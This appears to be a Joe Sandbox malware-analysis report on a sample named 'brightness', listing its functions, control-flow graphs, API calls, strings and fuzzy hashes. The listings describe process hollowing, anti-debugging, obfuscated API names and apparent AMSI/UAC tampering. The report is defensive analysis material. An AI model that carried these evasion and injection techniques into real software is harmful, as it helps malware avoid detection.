2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2902c2c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2918798 * 3 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2918798 * 2 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 * 5 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 2917ecc call 2918798 * 2 8353->8407 8354->8324 8406->8407 8407->7888
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                            • Part of subcall function 029185D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02918660
                                                                                                                                                                          • GetThreadContext.KERNEL32(000008A8,02962420,ScanString,029623A4,0291A774,UacInitialize,029623A4,0291A774,ScanBuffer,029623A4,0291A774,ScanBuffer,029623A4,0291A774,UacInitialize,029623A4), ref: 0291943A
                                                                                                                                                                            • Part of subcall function 0291824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029182BD
                                                                                                                                                                            • Part of subcall function 029184BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02918521
                                                                                                                                                                            • Part of subcall function 029179AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                          • API String ID: 2852987580-51457883
                                                                                                                                                                          • Opcode ID: 68f97b4b3c60256c30ec4d7434e225a77876995156b32c91c7dd0d46420366c7
                                                                                                                                                                          • Instruction ID: 4cc34e069a4ef96ce4d7a52542cc1e84b25c8ed55303bf02de5672927d16ec39
                                                                                                                                                                          • Opcode Fuzzy Hash: 68f97b4b3c60256c30ec4d7434e225a77876995156b32c91c7dd0d46420366c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 64E20530E0111C9FDB11EBA5CCD4EDEB3FAAFC5710F1095A1A609AB295DA30AE46CF51
                                                                                                                                                                          Function 02905A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 8710 2905a78-2905ab9 GetModuleFileNameA RegOpenKeyExA 8711 2905afb-2905b3e call 29058b4 RegQueryValueExA 8710->8711 8712 2905abb-2905ad7 RegOpenKeyExA 8710->8712 8717 2905b40-2905b5c RegQueryValueExA 8711->8717 8718 2905b62-2905b7c RegCloseKey 8711->8718 8712->8711 8713 2905ad9-2905af5 RegOpenKeyExA 8712->8713 8713->8711 8715 2905b84-2905bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8713->8715 8719 2905bbb-2905bbf 8715->8719 8720 2905c9e-2905ca5 8715->8720 8717->8718 8721 2905b5e 8717->8721 8723 2905bc1-2905bc5 8719->8723 8724 2905bcb-2905be1 lstrlenA 8719->8724 8721->8718 8723->8720 8723->8724 8725 2905be4-2905be7 8724->8725 8726 2905bf3-2905bfb 8725->8726 8727 2905be9-2905bf1 8725->8727 8726->8720 8729 2905c01-2905c06 8726->8729 8727->8726 8728 2905be3 8727->8728 8728->8725 8730 2905c30-2905c32 8729->8730 8731 2905c08-2905c2e lstrcpynA LoadLibraryExA 8729->8731 8730->8720 8732 2905c34-2905c38 8730->8732 8731->8730 8732->8720 8733 2905c3a-2905c6a lstrcpynA LoadLibraryExA 8732->8733 8733->8720 8734 2905c6c-2905c9c lstrcpynA LoadLibraryExA 8733->8734 8734->8720
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02900000,0292E790), ref: 02905A94
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AB2
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AD0
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02905B84,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02905BD2
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C19
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C29
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C51
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C61
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02905C87
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02905C97
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                          • Opcode ID: c93b178950f295db8e739cb85c0c15ae581e8f4e62a1260b4f11a966a60bede7
                                                                                                                                                                          • Instruction ID: 4e11b2950730cac7940661eb4169723310cf8899d0d42d928bea30d71b075580
                                                                                                                                                                          • Opcode Fuzzy Hash: c93b178950f295db8e739cb85c0c15ae581e8f4e62a1260b4f11a966a60bede7
                                                                                                                                                                          • Instruction Fuzzy Hash: D4518571A4021C7EFF25D6A4CCC6FEF77ADAB48744F8101A5BA04E61C1D7749A448F64
                                                                                                                                                                          Function 02918798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 10677 2918798-29187bd LoadLibraryW 10678 2918807-291880d 10677->10678 10679 29187bf-29187d7 GetProcAddress 10677->10679 10680 29187d9-29187f8 call 2917cf8 10679->10680 10681 29187fc-2918802 FreeLibrary 10679->10681 10680->10681 10684 29187fa 10680->10684 10681->10678 10684->10681
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                                                          • Opcode ID: fc8d4f475f1b749acc3e78dcaf86a7b57573fc5454f922aca20ec3120489a8fa
                                                                                                                                                                          • Instruction ID: 2ea4dded3dab55b8a8e78fbf68de6467e3bdf96fb4adbda9fc7faeec063b1a13
                                                                                                                                                                          • Opcode Fuzzy Hash: fc8d4f475f1b749acc3e78dcaf86a7b57573fc5454f922aca20ec3120489a8fa
                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0C871E8C3185EF310AB69A88CF3637DCA7C2B14F08092DF91887180E77414208B50
                                                                                                                                                                          Function 0291F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 10694 291f024-291f03e GetModuleHandleW 10695 291f040-291f052 GetProcAddress 10694->10695 10696 291f06a-291f072 10694->10696 10695->10696 10697 291f054-291f064 CheckRemoteDebuggerPresent 10695->10697 10697->10696 10698 291f066 10697->10698 10698->10696
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 0291F034
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0291F046
                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0291F05D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                          • API String ID: 35162468-539270669
                                                                                                                                                                          • Opcode ID: b51ab51fb62bfd3369e1697ad85aaa7b37660fa5fcba121698d871ce63c95a8d
                                                                                                                                                                          • Instruction ID: a7a13436bbc3e65764345aa5bbde893b6faecf7a4d2e49acf2208aa2fa73eba0
                                                                                                                                                                          • Opcode Fuzzy Hash: b51ab51fb62bfd3369e1697ad85aaa7b37660fa5fcba121698d871ce63c95a8d
                                                                                                                                                                          • Instruction Fuzzy Hash: B0F0A93090435CAEEB10B6EA88887EDFBBD9B15338FA443D4A465A25C1E7B10690C6A1
                                                                                                                                                                          Function 0291DFE4 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E01F
                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E04F
                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0291E064
                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0291E090
                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0291E099
                                                                                                                                                                            • Part of subcall function 02904C0C: SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                                                          • Opcode ID: 3db2c54e27a9a126d69a1edd1bb573befacfd3a1c2c750cbaa28f7a2b03716a9
                                                                                                                                                                          • Instruction ID: 3159c1bc5d5f9d7cb79f3102c554aacf56415d262cf26d2d5605c723120981c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2c54e27a9a126d69a1edd1bb573befacfd3a1c2c750cbaa28f7a2b03716a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8221C175A5030CBEEB11EAE5CC86FDE77BDAB48B00F500461B704F71C0D6B4AA058B65
                                                                                                                                                                          Function 0291E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291E86A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                          • Opcode ID: f90ebd11f290b0d65aa0a78a754de1924a0f71e77191d0db5ad0ac59d17876c8
                                                                                                                                                                          • Instruction ID: 24458253fe883ce08c1f6c40a0a1b31262dc327d5f4291469f636fb7bbd63e5e
                                                                                                                                                                          • Opcode Fuzzy Hash: f90ebd11f290b0d65aa0a78a754de1924a0f71e77191d0db5ad0ac59d17876c8
                                                                                                                                                                          • Instruction Fuzzy Hash: F941F735B1020C9FEB00FBA5D881E9EB7FAEFC8710F215475EA51A7284EA70AD018F50
                                                                                                                                                                          Function 0291DF00 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DFD2), ref: 0291DF3F
                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0291DF79
                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0291DFA6
                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0291DFAF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                          • Opcode ID: de9718cb2e20fad5bee2c32f0cec2fba3f1e84e46b53b8c01f34ce9a0a3db8cb
                                                                                                                                                                          • Instruction ID: a0d586f2a98f7e868b740fb46bbd0c80f876c5fc4a9a68902a3b036a0ba217ad
                                                                                                                                                                          • Opcode Fuzzy Hash: de9718cb2e20fad5bee2c32f0cec2fba3f1e84e46b53b8c01f34ce9a0a3db8cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B21EA71A4030CBEEB10EAE0CC82F9EB7BDAB44B00F604161B604F71C0D7B4AF048AA5
                                                                                                                                                                          Function 029179AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                          • Opcode ID: cdba9609a18d4180e4e1baf20518f2a4aa9b8e90d8ca91b069a0d67afca34093
                                                                                                                                                                          • Instruction ID: 17522a617635197b7dddfc0365bffd99ccc14c04c176a3f57f16175673bf527e
                                                                                                                                                                          • Opcode Fuzzy Hash: cdba9609a18d4180e4e1baf20518f2a4aa9b8e90d8ca91b069a0d67afca34093
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E115E7564020DAFEB00EFA5DC81EEEB7EDEB89710F414464F904D7280D730AA148B60
                                                                                                                                                                          Function 029179AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                          • API String ID: 4072585319-445027087
